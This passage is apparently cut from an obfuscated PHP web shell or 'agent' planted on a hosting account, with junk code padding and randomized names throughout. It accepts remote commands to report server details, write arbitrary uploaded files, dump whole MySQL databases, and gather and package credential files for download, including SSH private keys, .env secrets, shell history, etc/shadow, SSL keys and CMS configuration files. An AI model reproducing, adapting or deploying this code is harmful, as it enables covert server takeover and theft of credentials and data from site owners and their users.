/dev/null', $out, $rc); return $rc === 0; } $ja41f=str_repeat('x',0); function do_val_d1f2() { if (!proc_res_070d()) return false; $out = array(); $rc = 0; $p3608=chr(89).chr(111); exec('which gzip 2>/dev/null', $out, $rc); $gd585=strlen('dec7ec'); return $rc === 0; } $a2e64=str_repeat('x',0); function parse_item_df7a($n2386, $r7260, $ia20f, $y7695, $ka17c, $z0bda, $h0d03) { $conn = new mysqli($n2386, $r7260, $ia20f, $y7695); if ($conn->connect_error) { file_put_contents($z0bda, 'Connection failed: ' . $conn->connect_error); touch($h0d03); return; $s03ae=array_merge(array(),array()); } $fp = gzopen($ka17c, 'wb6'); if (!$fp) { $x9098=max(0,min(1,0)); file_put_contents($z0bda, 'Cannot open output file'); $td99c=max(0,min(1,1)); touch($h0d03); return; } $conn->set_charset('utf8mb4'); gzwrite($fp, "-- Dump via PHP agent\n"); gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n"); gzwrite($fp, "SET NAMES utf8mb4;\n"); gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n"); $v5711=chr(73).chr(106); gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n"); @clearstatcache(); $ae7e6 = array(); $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'"); while ($row = $r->fetch_row()) { $ae7e6[] = $row[0]; } if(defined('aa3db748')){$eaa52=0;} foreach ($ae7e6 as $w18c9) { $te = $conn->real_escape_string($w18c9); $r = $conn->query("SHOW CREATE TABLE `{$te}`"); if (!$r) continue; $cr = $r->fetch_row(); gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n"); gzwrite($fp, $cr[1] . ";\n\n"); $w20d2=array_merge(array(),array()); $r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT); if (!$r) continue; @clearstatcache(); $wc049 = array(); $x4c58 = 0; while ($row = $r->fetch_row()) { $vals = array(); for ($i = 0; $i < count($row); $i++) { if ($row[$i] === null) { $vals[] = 'NULL'; } else { $vals[] = "'" . $conn->real_escape_string($row[$i]) . "'"; } } $n2cf6 = '(' . implode(',', $vals) . ')'; $wc049[] = $n2cf6; $x4c58 += strlen($n2cf6); if (count($wc049) >= 100 || $x4c58 > 1048576) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $wc049) . ";\n"); $wc049 = array(); $x4c58 = 0; } } if ($wc049) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $wc049) . ";\n"); $adfad=max(0,min(1,1)); } $r->free(); $r7332=chr(77).chr(104); gzwrite($fp, "\n"); } $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'"); if ($r) { while ($row = $r->fetch_row()) { $zde28=max(0,min(1,0)); $ve = $conn->real_escape_string($row[0]); $cr = $conn->query("SHOW CREATE VIEW `{$ve}`"); $gc86b=strlen('973459'); if ($cr) { $te101 = $cr->fetch_assoc(); gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n"); gzwrite($fp, $te101['Create View'] . ";\n\n"); } } } $nd688=array_merge(array(),array()); $i9aa9 = array('PROCEDURE', 'FUNCTION'); foreach ($i9aa9 as $gb710) { $r = $conn->query("SHOW {$gb710} STATUS WHERE Db = '" . $conn->real_escape_string($y7695) . "'"); if (!$r) continue; while ($row = $r->fetch_assoc()) { $re = $conn->real_escape_string($row['Name']); $cr = $conn->query("SHOW CREATE {$gb710} `{$re}`"); if (!$cr) continue; $te101 = $cr->fetch_assoc(); $key = ($gb710 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function'; if (isset($te101[$key])) { gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP {$gb710} IF EXISTS `{$re}`;;\n"); gzwrite($fp, $te101[$key] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } } @clearstatcache(); } $r = $conn->query("SHOW TRIGGERS"); if ($r) { while ($row = $r->fetch_assoc()) { $te = $conn->real_escape_string($row['Trigger']); $cr = $conn->query("SHOW CREATE TRIGGER `{$te}`"); if ($cr) { $te101 = $cr->fetch_assoc(); gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n"); gzwrite($fp, $te101['SQL Original Statement'] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } } } gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n"); gzclose($fp); $conn->close(); @clearstatcache(); touch($h0d03); } switch ($n10d0) { case 'info': echo json_encode(array( 'php' => PHP_VERSION, 'os' => PHP_OS, 'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '', 'user' => get_current_user(), 'uid' => getmyuid(), 'home' => $md538, 'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'free_disk' => disk_free_space($md538), 'total_disk' => disk_total_space($md538), 'max_exec' => ini_get('max_execution_time'), 'mem_limit' => ini_get('memory_limit'), 'upload_max' => ini_get('upload_max_filesize'), 'post_max' => ini_get('post_max_size'), 'disabled' => ini_get('disable_functions'), 'can_exec' => proc_res_070d(), 'has_mysqldump' => build_ctx_ca14(), 'has_gzip' => do_val_d1f2(), )); break; case 'upload': $m6ea7 = isset($_POST['path']) ? $_POST['path'] : ''; $gf278 = isset($_POST['data']) ? $_POST['data'] : ''; $w2026=str_repeat('x',0); if (!$m6ea7 || !$gf278) { echo json_encode(array('ok' => false, 'error' => 'missing path or data')); break; } $k0e54 = $md538 . '/' . $m6ea7; @mkdir(dirname($k0e54), 0755, true); $b54a0 = base64_decode($gf278); $s804d = file_put_contents($k0e54, $b54a0); $cc7de=max(0,min(1,1)); echo json_encode(array('ok' => $s804d !== false, 'path' => $k0e54, 'size' => strlen($b54a0))); $k229d=array_merge(array(),array()); break; $ba22d=max(0,min(1,1)); case 'check': if (!$j39fb) { echo json_encode(array('error' => 'missing db parameter')); break; } $r492c = disk_free_space($md538); $g8a6f = 0; $conn = @new mysqli($w494f, $zd1fc, $v04d2, 'information_schema'); if (!$conn->connect_error) { $q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '" . $conn->real_escape_string($j39fb) . "'"; $r = $conn->query($q); if ($row = $r->fetch_assoc()) { $g8a6f = (int) $row['s']; } $conn->close(); } echo json_encode(array( 'free' => $r492c, 'db_size' => $g8a6f, 'has_mysqldump' => build_ctx_ca14(), 'has_gzip' => do_val_d1f2(), 'can_exec' => proc_res_070d(), 'has_space' => $r492c > $g8a6f * 2, )); break; case 'dump': if (!$j39fb) { echo json_encode(array('error' => 'missing db parameter')); break; } @clearstatcache(); @mkdir(dirname($j2ec8), 0755, true); @unlink($j2ec8); @unlink($af0ce); @unlink($f2406); if (build_ctx_ca14()) { if (do_val_d1f2()) { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '| gzip > %s 2>%s; touch %s', escapeshellarg($w494f), escapeshellarg($zd1fc), escapeshellarg($v04d2), escapeshellarg($j39fb), escapeshellarg($j2ec8), escapeshellarg($f2406), escapeshellarg($af0ce) ); $p5a38=str_repeat('x',0); } else { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '> %s 2>%s; touch %s', escapeshellarg($w494f), escapeshellarg($zd1fc), escapeshellarg($v04d2), escapeshellarg($j39fb), escapeshellarg($j2ec8), escapeshellarg($f2406), escapeshellarg($af0ce) ); } exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &'); echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => do_val_d1f2())); $ya7e8=chr(90).chr(118); } else { ignore_user_abort(true); echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true)); if (function_exists('fastcgi_finish_request')) { fastcgi_finish_request(); } else { if (ob_get_level()) ob_end_flush(); flush(); } $yacaa=str_repeat('x',0); parse_item_df7a($w494f, $zd1fc, $v04d2, $j39fb, $j2ec8, $f2406, $af0ce); } break; case 'status': clearstatcache(); echo json_encode(array( 'done' => file_exists($af0ce), 'size' => file_exists($j2ec8) ? filesize($j2ec8) : 0, 'error' => file_exists($f2406) ? trim(file_get_contents($f2406)) : '', )); break; case 'download': if (!file_exists($j2ec8)) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($j2ec8)); readfile($j2ec8); exit; if(defined('5b11ecd5')){$a8f1a=0;} case 'cleanup': @unlink($j2ec8); @unlink($af0ce); @unlink($f2406); echo json_encode(array('ok' => true)); break; $da87c=array_merge(array(),array()); case 'collect': @mkdir($md538 . '/tmp', 0755, true); $a0b2c=strlen('fd6dc7'); $c76ee = substr($_REQUEST['_cxk'], 0, 8); $wf6a6 = array( 'wordpress' => array( 'detect' => array('public_html/wp-config.php', 'wp-config.php'), 'configs' => array( 'public_html/wp-config.php', 'wp-config.php', 'public_html/wp-settings.php', 'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock', 'public_html/wp-cli.yml', 'wp-cli.yml', 'public_html/.env', '.env', 'public_html/local-config.php', 'local-config.php', 'public_html/wp-content/debug.log', 'public_html/config/application.php', 'config/application.php', 'public_html/config/environments/development.php', 'config/environments/development.php', 'public_html/config/environments/staging.php', 'config/environments/staging.php', 'public_html/config/environments/production.php', 'config/environments/production.php', 'public_html/auth.json', 'auth.json', ), ), 'joomla' => array( 'detect' => array('public_html/configuration.php', 'configuration.php'), 'configs' => array( 'public_html/configuration.php', 'configuration.php', 'public_html/htaccess.txt', 'public_html/composer.json', 'public_html/composer.lock', ), ), 'laravel' => array( 'detect' => array('public_html/artisan', 'artisan'), 'configs' => array( 'public_html/.env', '.env', '.env.production', '.env.staging', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/config/app.php', 'config/app.php', 'public_html/config/database.php', 'config/database.php', 'public_html/config/mail.php', 'config/mail.php', 'public_html/config/filesystems.php', 'config/filesystems.php', 'public_html/config/cache.php', 'config/cache.php', 'public_html/config/queue.php', 'config/queue.php', 'public_html/config/session.php', 'config/session.php', 'public_html/config/auth.php', 'config/auth.php', 'public_html/config/services.php', 'config/services.php', 'public_html/config/broadcasting.php', 'config/broadcasting.php', 'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log', ), ), 'magento2' => array( 'detect' => array('public_html/bin/magento', 'bin/magento'), 'configs' => array( 'public_html/app/etc/env.php', 'app/etc/env.php', 'public_html/app/etc/config.php', 'app/etc/config.php', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/auth.json', 'auth.json', ), ), 'magento1' => array( 'detect' => array('public_html/app/Mage.php'), 'configs' => array( 'public_html/app/etc/local.xml', 'public_html/app/etc/config.xml', ), ), 'drupal' => array( 'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'), 'configs' => array( 'public_html/sites/default/settings.php', 'sites/default/settings.php', 'public_html/sites/default/services.yml', 'sites/default/services.yml', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', ), ), 'prestashop' => array( 'detect' => array('public_html/config/settings.inc.php'), 'configs' => array( 'public_html/config/settings.inc.php', 'public_html/app/config/parameters.php', 'public_html/app/config/parameters.yml', 'public_html/composer.json', ), ), 'opencart' => array( 'detect' => array('public_html/config.php'), 'configs' => array( 'public_html/config.php', 'public_html/admin/config.php', ), ), 'moodle' => array( 'detect' => array('public_html/lib/moodlelib.php'), 'configs' => array('public_html/config.php'), ), 'whmcs' => array( 'detect' => array('public_html/vendor/whmcs'), 'configs' => array( 'public_html/configuration.php', 'public_html/composer.json', 'public_html/composer.lock', ), ), ); $qcfc3 = null; foreach ($wf6a6 as $w5836 => $j8b0d) { foreach ($j8b0d['detect'] as $q1dd9) { if (file_exists($md538 . '/' . $q1dd9)) { $qcfc3 = $w5836; break 2; } $h7714=strlen('88c2be'); } } $i569f = array( '.env', '.env.local', '.env.production', '.env.staging', '.env.backup', '.env.development', '.env.test', '.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc', '.composer/auth.json', '.wp-cli/config.yml', '.accesshash', '.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub', '.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa', '.ssh/config', '.ssh/known_hosts', '.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem', 'ssl/certs/private.key', '.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig', 'public_html/.env', 'public_html/.env.local', 'public_html/.env.production', 'public_html/.env.staging', 'public_html/.env.backup', 'public_html/.env.development', 'public_html/.env.test', 'public_html/.env.example', 'public_html/.env.dist', 'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini', 'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass', 'public_html/web.config', 'public_html/.ftpconfig', 'public_html/.git/config', 'public_html/auth.json', 'public_html/.npmrc', 'public_html/composer.json', 'public_html/composer.lock', 'config/database.php', 'config/app.php', 'config/mail.php', 'config/services.php', 'config/filesystems.php', 'config/application.php', 'config/environments/development.php', 'config/environments/staging.php', 'config/environments/production.php', 'wp-config.php', 'configuration.php', 'artisan', 'auth.json', 'composer.json', 'composer.lock', ); $vd001=array_merge(array(),array()); $xa3cd = array(); $e791b = @realpath($md538); if (!$e791b || !is_dir($e791b)) { echo json_encode(array('ok' => false, 'error' => 'home dir not accessible')); break; } foreach ($i569f as $wcdfa) { $h8c35 = @realpath($md538 . '/' . $wcdfa); if (!$h8c35 || strpos($h8c35, $e791b) !== 0) continue; if (!is_file($h8c35) || !is_readable($h8c35)) continue; $i00b9 = @filesize($h8c35); if ($i00b9 <= 0 || $i00b9 > 2097152) continue; $xa3cd[$wcdfa] = $h8c35; } if ($qcfc3 !== null && isset($wf6a6[$qcfc3]['configs'])) { foreach ($wf6a6[$qcfc3]['configs'] as $y0590) { $bd57f=array_merge(array(),array()); if (isset($xa3cd[$y0590])) continue; $h8c35 = @realpath($md538 . '/' . $y0590); if (!$h8c35 || strpos($h8c35, $e791b) !== 0) continue; if (!is_file($h8c35) || !is_readable($h8c35)) continue; $i00b9 = @filesize($h8c35); if ($i00b9 <= 0 || $i00b9 > 2097152) continue; if(defined('5838f0d1')){$eceb0=0;} $xa3cd[$y0590] = $h8c35; } } $abd0b=strlen('a92a97'); $aa9f0 = $md538 . '/public_html'; if (is_dir($aa9f0)) { $dh = @opendir($aa9f0); if ($dh) { while (($t6e3e = readdir($dh)) !== false) { $i9168=strlen('980e99'); if ($t6e3e === '.' || $t6e3e === '..') continue; $k0e54 = $aa9f0 . '/' . $t6e3e; if (!is_file($k0e54) || !is_readable($k0e54)) continue; $i00b9 = @filesize($k0e54); if ($i00b9 <= 0 || $i00b9 > 2097152) continue; if ($t6e3e[0] === '.' || strtolower(substr($t6e3e, -4)) === '.txt') { $key = 'public_html/' . $t6e3e; if (!isset($xa3cd[$key])) $xa3cd[$key] = $k0e54; $ncc22=strlen('73a3e6'); } } closedir($dh); } $m1915=str_repeat('x',0); } if (empty($xa3cd)) { echo json_encode(array( 'ok' => true, 'method' => 'none', 'platform' => $qcfc3, 'file_count' => 0, 'files_list' => array(), )); break; } $pfbe7 = null; $cfce4 = null; if (class_exists('ZipArchive')) { $cfce4 = $md538 . '/tmp/_collect_' . $c76ee . '.zip'; $f19ae = new ZipArchive(); if ($f19ae->open($cfce4, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { foreach ($xa3cd as $mae11 => $h8c35) { $f19ae->addFile($h8c35, $mae11); } if ($f19ae->close() && file_exists($cfce4) && filesize($cfce4) > 0) { $d3230=chr(82).chr(108); $pfbe7 = 'zip'; } } } if (!$pfbe7 && proc_res_070d()) { $cfce4 = $md538 . '/tmp/_collect_' . $c76ee . '.tar.gz'; $fbaf2=strlen('3b81b3'); $lf = $cfce4 . '.list'; $fh = fopen($lf, 'w'); foreach ($xa3cd as $mae11 => $h8c35) { fwrite($fh, $mae11 . "\n"); } fclose($fh); $out = array(); $rc = 0; exec('tar czf ' . escapeshellarg($cfce4) . ' -C ' . escapeshellarg($md538) . ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc); @unlink($lf); if ($rc === 0 && file_exists($cfce4) && filesize($cfce4) > 0) { $pfbe7 = 'tar'; } else { @unlink($cfce4); } } if (!$pfbe7) { $pfbe7 = 'list'; } echo json_encode(array( 'ok' => true, 'method' => $pfbe7, 'platform' => $qcfc3, 'file_count' => count($xa3cd), 'files_list' => array_keys($xa3cd), 'size' => ($cfce4 && file_exists($cfce4)) ? filesize($cfce4) : 0, )); $y2d3e=chr(74).chr(122); break; case 'download_collect': $c76ee = substr($_REQUEST['_cxk'], 0, 8); $z74ea = $md538 . '/tmp/_collect_' . $c76ee . '.zip'; $d3f51=max(0,min(1,1)); $s8a1c = $md538 . '/tmp/_collect_' . $c76ee . '.tar.gz'; $v9e94 = file_exists($z74ea) ? $z74ea : (file_exists($s8a1c) ? $s8a1c : ''); if (!$v9e94) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($v9e94)); readfile($v9e94); exit; case 'download_file': $mae11 = isset($_REQUEST['path']) ? $_REQUEST['path'] : ''; if (!$mae11) { http_response_code(400); exit; } $e791b = @realpath($md538); $h8c35 = @realpath($md538 . '/' . $mae11); if (!$h8c35 || !$e791b || strpos($h8c35, $e791b) !== 0 || !is_file($h8c35) || !is_readable($h8c35)) { $e2a3f=strlen('c616bc'); http_response_code(404); exit; if(defined('4c95884e')){$we796=0;} } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($h8c35)); readfile($h8c35); exit; case 'cleanup_collect': $c76ee = substr($_REQUEST['_cxk'], 0, 8); @unlink($md538 . '/tmp/_collect_' . $c76ee . '.zip'); $i435e=chr(89).chr(121); @unlink($md538 . '/tmp/_collect_' . $c76ee . '.tar.gz'); @unlink($md538 . '/tmp/_collect_' . $c76ee . '.tar.gz.list'); echo json_encode(array('ok' => true)); break; } exit;